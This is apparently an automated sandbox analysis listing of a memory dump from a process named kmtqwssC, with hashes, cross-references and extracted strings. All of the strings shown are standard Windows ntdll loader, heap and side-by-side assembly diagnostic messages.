                                                                  • Instruction ID: 4038e5b3639bbcbda23c7b6b53f082b4468788d1bb17bd7ffcfe7986328e80e1
                                                                  • Opcode Fuzzy Hash: b1f0ef4f3446b4a6ff0de7ebf802db40e72720ffdeedc1b57e1c63ac2d66fbaa
                                                                  • Instruction Fuzzy Hash: 88B09B729059C6C6D751E7604A0970779006BD0705F15C161D3134641F4778C5D1F576
                                                                  Strings
                                                                  • The critical section is owned by thread %p., xrefs: 2CE88E69
                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 2CE88D8C
                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 2CE88F34
                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 2CE88DD3
                                                                  • The resource is owned exclusively by thread %p, xrefs: 2CE88E24
                                                                  • The resource is owned shared by %d threads, xrefs: 2CE88E2E
                                                                  • *** enter .exr %p for the exception record, xrefs: 2CE88FA1
                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 2CE88E02
                                                                  • write to, xrefs: 2CE88F56
                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 2CE88DA3
                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 2CE88DB5
                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 2CE88E4B
                                                                  • *** enter .cxr %p for the context, xrefs: 2CE88FBD
                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 2CE88DC4
                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 2CE88F2D
                                                                  • The instruction at %p tried to %s , xrefs: 2CE88F66
                                                                  • This failed because of error %Ix., xrefs: 2CE88EF6
                                                                  • *** then kb to get the faulting stack, xrefs: 2CE88FCC
                                                                  • read from, xrefs: 2CE88F5D, 2CE88F62
                                                                  • *** Inpage error in %ws:%s, xrefs: 2CE88EC8
                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 2CE88E86
                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 2CE88E3F
                                                                  • The instruction at %p referenced memory at %p., xrefs: 2CE88EE2
                                                                  • a NULL pointer, xrefs: 2CE88F90
                                                                  • an invalid address, %p, xrefs: 2CE88F7F
                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 2CE88FEF
                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 2CE88F3F
                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 2CE88F26
                                                                  • <unknown>, xrefs: 2CE88D2E, 2CE88D81, 2CE88E00, 2CE88E49, 2CE88EC7, 2CE88F3E
                                                                  • Go determine why that thread has not released the critical section., xrefs: 2CE88E75
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • API String ID: 0-108210295
                                                                  • Opcode ID: 355deb901f7c9f4c8e3dcacd87d999466f7ceb4342ed3583a7bab30f0a4ac956
                                                                  • Instruction ID: 517ebd75f2b8bfa115721ac0f1bf59cc476374e74b0344611b3a8a1cd526a808
                                                                  • Opcode Fuzzy Hash: 355deb901f7c9f4c8e3dcacd87d999466f7ceb4342ed3583a7bab30f0a4ac956
                                                                  • Instruction Fuzzy Hash: 0C81F279A04124BFDB228B14CC85DAB3B76EF66754F010548F91C6F236E3328697DA63
                                                                  Strings
                                                                  • corrupted critical section, xrefs: 2CE454C2
                                                                  • undeleted critical section in freed memory, xrefs: 2CE4542B
                                                                  • 8, xrefs: 2CE452E3
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2CE454CE
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2CE4540A, 2CE45496, 2CE45519
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2CE454E2
                                                                  • Critical section debug info address, xrefs: 2CE4541F, 2CE4552E
                                                                  • Address of the debug info found in the active list., xrefs: 2CE454AE, 2CE454FA
                                                                  • Critical section address, xrefs: 2CE45425, 2CE454BC, 2CE45534
                                                                  • Critical section address., xrefs: 2CE45502
                                                                  • double initialized or corrupted critical section, xrefs: 2CE45508
                                                                  • Invalid debug info address of this critical section, xrefs: 2CE454B6
                                                                  • Thread identifier, xrefs: 2CE4553A
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 2CE45543
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  Strings
                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 2CE422E4
                                                                  • @, xrefs: 2CE4259B
                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 2CE42602
                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 2CE42624
                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 2CE424C0
                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2CE425EB
                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 2CE42409
                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 2CE42506
                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 2CE4261F
                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 2CE42498
                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 2CE42412
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                  Strings
                                                                  • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 2CE429B1
                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2CE4292E
                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 2CE428B2
                                                                  • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 2CE42856
                                                                  • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 2CE429AC
                                                                  • @, xrefs: 2CE03180
                                                                  • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 2CE42881
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                  Strings
                                                                  • VerifierFlags, xrefs: 2CE58C50
                                                                  • VerifierDebug, xrefs: 2CE58CA5
                                                                  • HandleTraces, xrefs: 2CE58C8F
                                                                  • VerifierDlls, xrefs: 2CE58CBD
                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 2CE58A67
                                                                  • AVRF: -*- final list of providers -*- , xrefs: 2CE58B8F
                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 2CE58A3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                  Strings
                                                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 2CE54E38
                                                                  • Execute '.cxr %p' to dump context, xrefs: 2CE54EB1
                                                                  • ***Exception thrown within loader***, xrefs: 2CE54E27
                                                                  • LdrpGenericExceptionFilter, xrefs: 2CE54DFC
                                                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 2CE54DF5
                                                                  • LdrpProtectedCopyMemory, xrefs: 2CE54DF4
                                                                  • minkernel\ntdll\ldrutil.c, xrefs: 2CE54E06
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                  Strings
                                                                  • \WinSxS\, xrefs: 2CE02E23
                                                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 2CE42706
                                                                  • .Local\, xrefs: 2CE02D91
                                                                  • @, xrefs: 2CE02E4D
                                                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 2CE4279C
                                                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 2CE4276F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                  Strings
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 2CE29A01
                                                                  • apphelp.dll, xrefs: 2CDC6496
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 2CE29A2A
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 2CE299ED
                                                                  • LdrpInitShimEngine, xrefs: 2CE299F4, 2CE29A07, 2CE29A30
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE29A11, 2CE29A3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  Strings
                                                                  • LdrpInitializeProcess, xrefs: 2CE0C6C4
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 2CE48170
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 2CE48181, 2CE481F5
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 2CE481E5
                                                                  • LdrpInitializeImportRedirection, xrefs: 2CE48177, 2CE481EB
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE0C6C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  Strings
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 2CE42160, 2CE4219A, 2CE421BA
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 2CE421BF
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2CE4219F
                                                                  • SXS: %s() passed the empty activation context, xrefs: 2CE42165
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 2CE42178
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 2CE42180
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  APIs
                                                                    • Part of subcall function 2CE12DF0: LdrInitializeThunk.NTDLL ref: 2CE12DFA
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE10BA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE10BB6
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE10D60
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE10D74
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 1404860816-0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                  • API String ID: 0-2518169356
                                                                  Strings
                                                                  • LdrpInitializeProcess, xrefs: 2CE08422
                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2CE0855E
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE08421
                                                                  • @, xrefs: 2CE08591
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1918872054
                                                                  Strings
                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 2CE354ED
                                                                  • HEAP[%wZ]: , xrefs: 2CE354D1, 2CE35592
                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 2CE355AE
                                                                  • HEAP: , xrefs: 2CE354E0, 2CE355A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                  • API String ID: 0-1657114761
                                                                  Strings
                                                                  • SXS: %s() passed the empty activation context, xrefs: 2CE421DE
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 2CE422B6
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 2CE421D9, 2CE422B1
                                                                  • .Local, xrefs: 2CE028D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  Strings
                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 2CE43437
                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 2CE4342A
                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 2CE43456
                                                                  • RtlDeactivateActivationContext, xrefs: 2CE43425, 2CE43432, 2CE43451
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                  • API String ID: 0-1245972979
                                                                  Strings
                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 2CE31028
                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 2CE310AE
                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2CE3106B
                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 2CE30FE5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                  • API String ID: 0-1468400865
                                                                  Strings
                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 2CE43640, 2CE4366C
                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 2CE4362F
                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 2CE4365C
                                                                  • LdrpFindDllActivationContext, xrefs: 2CE43636, 2CE43662
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 0-3779518884
                                                                  Strings
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2CE3A992
                                                                  • apphelp.dll, xrefs: 2CDF2462
                                                                  • LdrpDynamicShimModule, xrefs: 2CE3A998
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE3A9A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-176724104
                                                                  Strings
                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2CDE327D
                                                                  • HEAP[%wZ]: , xrefs: 2CDE3255
                                                                  • HEAP: , xrefs: 2CDE3264
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                  • API String ID: 0-617086771
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $@
                                                                  • API String ID: 0-1077428164
                                                                  Strings
                                                                  • LdrpCheckModule, xrefs: 2CE3A117
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 2CE3A10F
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE3A121
                                                                  Memory Dump Source
